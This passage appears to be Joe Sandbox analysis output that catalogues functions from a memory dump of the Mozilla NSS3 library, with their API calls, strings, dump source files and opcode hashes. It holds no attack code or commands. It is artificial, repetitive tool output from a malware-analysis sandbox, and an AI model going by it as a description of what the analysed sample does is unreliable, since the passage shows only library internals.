                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE61B270B052059FDB05CF65C880BAA77B2BF45308F2445A9EC095BB56D731EC66CBE1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CDEFD7A
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CDEFD94
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CDEFE3C
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CDEFE83
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDEFEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6CDEFEFA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDEFEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6CDEFF3B
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                      • API String ID: 1169254434-598938438
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1d9039ac6e25c4fc91fc41dc58d994a4fb00e2dea6abeb27f65cb641e9d78d9e
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 4baa97d0adee6feb95137034b23bd6deb65bde080825018a20ace3705b5b8967
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d9039ac6e25c4fc91fc41dc58d994a4fb00e2dea6abeb27f65cb641e9d78d9e
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B516371A00205DFDB04CF99D8D0AAEBBB1EF4C708F144469E905AB766E735ED50CBA0
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF32FFD
                                                                                                                                                                                                                                                                                                                      • sqlite3_initialize.NSS3 ref: 6CF33007
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CF33032
                                                                                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(6CF9AAF9,?), ref: 6CF33073
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6CF330B3
                                                                                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6CF330C0
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • sqlite3_get_table() called with two or more incompatible queries, xrefs: 6CF330BB
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
                                                                                                                                                                                                                                                                                                                      • String ID: sqlite3_get_table() called with two or more incompatible queries
                                                                                                                                                                                                                                                                                                                      • API String ID: 750880481-4279182443
                                                                                                                                                                                                                                                                                                                      • Opcode ID: e93326c27fa4c30e9aea676672c412e86af2a8b102291e7f30491d04445d326c
                                                                                                                                                                                                                                                                                                                      • Instruction ID: cfc5f8ee2e80fe53719c4f42ee34cfc57148b0681ef44afb0f1f21472305dd2d
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e93326c27fa4c30e9aea676672c412e86af2a8b102291e7f30491d04445d326c
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB41B3B1600616AFDB00CF25D880A8AB7B5FF44368F158629EC2987B50E735F95ACBD1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(q]l), ref: 6CEB5F0A
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CEB5F1F
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(89000904), ref: 6CEB5F2F
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(890008E8), ref: 6CEB5F55
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6CEB5F6D
                                                                                                                                                                                                                                                                                                                      • SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6CEB5F7D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB5220: TlsGetValue.KERNEL32(00000000,890008E8,?,6CEB5F82,8B4274C0), ref: 6CEB5248
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB5220: EnterCriticalSection.KERNEL32(0F6CF80D,?,6CEB5F82,8B4274C0), ref: 6CEB525C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB5220: PR_SetError.NSS3(00000000,00000000), ref: 6CEB528E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB5220: PR_Unlock.NSS3(0F6CF7F1), ref: 6CEB5299
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB5220: free.MOZGLUE(00000000), ref: 6CEB52A9
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
                                                                                                                                                                                                                                                                                                                      • String ID: q]l
                                                                                                                                                                                                                                                                                                                      • API String ID: 3150690610-3830342008
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5d1fd31ae08f61db1acd02c259e895cc07de606c7486d2f9521350a0a3c5beec
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9ebd129fe95caaa54319e63e09c9fcd19c2425960f0c42605b983a9a5da4a81b
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d1fd31ae08f61db1acd02c259e895cc07de606c7486d2f9521350a0a3c5beec
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D21B7B1D012049FDB11AF64EC41BEFB7B4EF09318F644029E90AA7741E731A954CBD1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000,00000000,?,6CE8124D,00000001), ref: 6CE78D19
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,6CE8124D,00000001), ref: 6CE78D32
                                                                                                                                                                                                                                                                                                                      • PL_ArenaRelease.NSS3(?,?,?,?,?,6CE8124D,00000001), ref: 6CE78D73
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6CE8124D,00000001), ref: 6CE78D8C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: TlsGetValue.KERNEL32 ref: 6CF0DD8C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CF0DDB4
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6CE8124D,00000001), ref: 6CE78DBA
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                                                                                                                                                      • String ID: KRAM$KRAM
                                                                                                                                                                                                                                                                                                                      • API String ID: 2419422920-169145855
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 24c6ae45a53cc18bf7cf27bf0998375659b6cd25e2f614cea6119f1b3f8e283b
                                                                                                                                                                                                                                                                                                                      • Instruction ID: c20a2132d9b4b8b5183e3475162e3539271566a603973476292487cfbb981b7d
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24c6ae45a53cc18bf7cf27bf0998375659b6cd25e2f614cea6119f1b3f8e283b
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 932192B5A04601CFCB60EF38C58469EBBF4FF55318F25896AD99897701E734E842CBA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CF70EE6
                                                                                                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CF70EFA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CE5AF0E
                                                                                                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF70F16
                                                                                                                                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF70F1C
                                                                                                                                                                                                                                                                                                                      • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF70F25
                                                                                                                                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF70F2B
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                                                                                                                                                                                                                                      • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                                                                                                                                      • API String ID: 2948422844-1374795319
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 19b9784a439cff6cd6ec96c6a9a63fa9f1572de430dbd8ab513731f8378ecc04
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6a9dc0a2504ef326bb03cad6cbee7b7420c8cae704a57b0deaad5a00bf9fe53a
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19b9784a439cff6cd6ec96c6a9a63fa9f1572de430dbd8ab513731f8378ecc04
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A01ADB9A10104ABDF11AFA4EC85AAB3B3CEF4A364B404025FD0987701D672E95087B2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,w=l,?,?,6CE54E1D), ref: 6CF51C8A
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6CF51CB6
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: sqlite3_freesqlite3_mprintf
                                                                                                                                                                                                                                                                                                                      • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$w=l
                                                                                                                                                                                                                                                                                                                      • API String ID: 1840970956-366597085
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6a047798e2348c3729944949bad6c90a7424fb3bf8ecb6fe2af4337d97f455d8
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 35aa9028b17fbb1b14424588fca40bdd84e275456e10369f3edc584c98de18b9
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a047798e2348c3729944949bad6c90a7424fb3bf8ecb6fe2af4337d97f455d8
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A001F7B1A001405BEB04BF6CD402AB277E5EF8634CF56487DED459BB12EB22E866C751
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CF34DC3
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF34DE0
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6CF34DDA
                                                                                                                                                                                                                                                                                                                      • API call with %s database connection pointer, xrefs: 6CF34DBD
                                                                                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CF34DCB
                                                                                                                                                                                                                                                                                                                      • misuse, xrefs: 6CF34DD5
                                                                                                                                                                                                                                                                                                                      • invalid, xrefs: 6CF34DB8
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                                                                                                                      • API String ID: 632333372-2974027950
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 64283a0011f8086807d17666c5084cc34ed658ce45c871578db7c6a5de52da62
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 531e52367939defa03d7973f2b823d57ca56008f7f80b3c91069cf2650c16f62
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64283a0011f8086807d17666c5084cc34ed658ce45c871578db7c6a5de52da62
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97F0B411E145747BEA025155DC10FC63F955F01319F5619A1ED0CABE52D2079D6082D1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CF34E30
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF34E4D
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6CF34E47
                                                                                                                                                                                                                                                                                                                      • API call with %s database connection pointer, xrefs: 6CF34E2A
                                                                                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CF34E38
                                                                                                                                                                                                                                                                                                                      • misuse, xrefs: 6CF34E42
                                                                                                                                                                                                                                                                                                                      • invalid, xrefs: 6CF34E25
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                                                                                                                      • API String ID: 632333372-2974027950
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 2e0922c42e8bbe43fb9e12979f510d62245d9fc0cf101f7b12a8de02f5819a1a
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0fc4891a5b1acf90e4e4134c3139ff5f6d6d4bc7db468c80ae8d746ea6d9f2bf
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e0922c42e8bbe43fb9e12979f510d62245d9fc0cf101f7b12a8de02f5819a1a
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FF02711F489383BFA101266DC10FC73F854B01329F1994B1EA0C77ED2D20B9DB042D1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE6A086
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE6A09B
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CE6A0B7
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE6A0E9
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE6A11B
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE6A12F
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CE6A148
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE81A40: PR_Now.NSS3(?,00000000,6CE628AD,00000000,?,6CE7F09A,00000000,6CE628AD,6CE693B0,?,6CE693B0,6CE628AD,00000000,?,00000000), ref: 6CE81A65
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE81940: CERT_DestroyCertificate.NSS3(00000000,00000000,?,6CE84126,?), ref: 6CE81966
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE6A1A3
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Arena_CriticalEnterFreeSectionUnlockUtilValue$CertificateDestroy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3953697463-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: e1abbb9f1ecf1156669e5fcc949029ad45a2834a960a935b3a930d48887d9971
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 638d00247e3dc4e366688b66ada370362af92381be89a9368bae01d6cc744565
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1abbb9f1ecf1156669e5fcc949029ad45a2834a960a935b3a930d48887d9971
